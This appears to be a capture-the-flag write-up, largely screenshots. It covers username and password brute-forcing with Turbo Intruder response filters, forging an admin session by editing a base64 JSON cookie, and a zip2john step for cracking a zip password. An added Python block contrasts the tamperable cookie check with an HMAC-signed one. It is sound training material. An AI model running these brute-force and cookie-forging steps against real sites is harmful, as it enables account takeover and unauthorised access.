![d39c520fe61945ec6ed741900fe89baf.png](aec217734c424b8ba55a1bcba609e5c4.png)
![df97b3eae7b89c51e3de509d8cb3d389.png](44a8c18e63964850a99f665762dd088f.png)
It kicks back `invalid username` as the error, which makes me think we can brute-force the username, and then maybe it'll kick back an invalid password error once we have the username.
![fdd90f8ddb8d6714a3f604d1cd722cf4.png](5cd30bfc12e94e20840a2a542a437885.png)
![0c901fa59a1f0186ffcdf6a9d62e13da.png](72f48cc575c54a1d8e06637063e4303f.png)
Pertinent Turbo Intruder script excerpt:
```
def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    # keep only the responses where the error is 'Invalid Password'
    if 'Invalid Password' in req.response:
        table.add(req)
```
Now going to do the same for the password:
```
if 'Invalid Password' not in req.response:
    table.add(req)
```
![b9cf140322b5022fafa693e54ee884a1.png](6ca5ffd273664d11b4e2e8b8a6e61adc.png)
The cookie is
`eyJjb29raWUiOiIxYjVlNWYyYzlkNThhMzBhZjRlMTZhNzFhNDVkMDE3MiIsImFkbWluIjpmYWxzZX0=`
which base64-decodes to
`{"cookie":"1b5e5f2c9d58a30af4e16a71a45d0172","admin":false}`
Changing the `admin` value to `true` and changing the cookie gives us
![6bd0c241ff39beb30744742192dc376f.png](2d119097933e47daa89e2c45511bb2f5.png)
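The cookie above is only base64-encoded JSON, so the server cannot tell an edited `admin` field from one it issued. As an added example (not code from the challenge or from this writeup), the sketch below puts that weak check next to an HMAC-signed variant that rejects the edit; `SERVER_KEY`, the function names and the `body.tag` cookie layout are assumptions.

```python
import base64
import hashlib
import hmac
import json

# Cookie value quoted in the writeup above.
PAGE_COOKIE = "eyJjb29raWUiOiIxYjVlNWYyYzlkNThhMzBhZjRlMTZhNzFhNDVkMDE3MiIsImFkbWluIjpmYWxzZX0="
# Constructed demo key (assumption); a real service loads its key from a secret store.
SERVER_KEY = b"constructed-demo-key"

def naive_is_admin(cookie: str) -> bool:
    """Weak pattern: trust whatever JSON the client sends back."""
    return json.loads(base64.b64decode(cookie)).get("admin") is True

def flip_admin(cookie: str) -> str:
    """Re-encode with admin=true; this needs no secret, which is the flaw."""
    data = json.loads(base64.b64decode(cookie))
    data["admin"] = True
    return base64.b64encode(json.dumps(data).encode()).decode()

def sign(payload: dict, key: bytes = SERVER_KEY) -> str:
    """Issue a cookie as b64(json) + "." + b64(HMAC-SHA256 over the body)."""
    body = base64.urlsafe_b64encode(json.dumps(payload).encode())
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body.decode() + "." + base64.urlsafe_b64encode(tag).decode()

def verified_is_admin(cookie: str, key: bytes = SERVER_KEY) -> bool:
    """Hardened pattern: check the tag before reading any field."""
    try:
        body, tag = cookie.split(".")
        expected = hmac.new(key, body.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, base64.urlsafe_b64decode(tag)):
            return False
        return json.loads(base64.urlsafe_b64decode(body)).get("admin") is True
    except (ValueError, AttributeError):
        return False  # malformed, unsigned or non-object cookies are rejected

def swap_body(signed: str, payload: dict) -> str:
    """Constructed tamper case: new body paired with the old tag."""
    body = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()
    return body + "." + signed.split(".")[1]

if __name__ == "__main__":
    user = sign({"cookie": "constructed-session-id", "admin": False})
    print("naive accepts edited cookie:", naive_is_admin(flip_admin(PAGE_COOKIE)))
    print("signed accepts edited cookie:",
          verified_is_admin(swap_body(user, {"cookie": "x", "admin": True})))
```

Keeping the role in server-side session state, keyed by the session id, removes the client-held flag altogether.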
The zip file has a password
`zip2john file.zip > forjohn`
![841697307ea838d95300bd9b4185da8c.png](c369ddc6a288493da2956f5745715da9.png)
![8300f0a5bbc624268b8fb036b19894c6.png](05afe257acae4f088534811837aa50d1.png)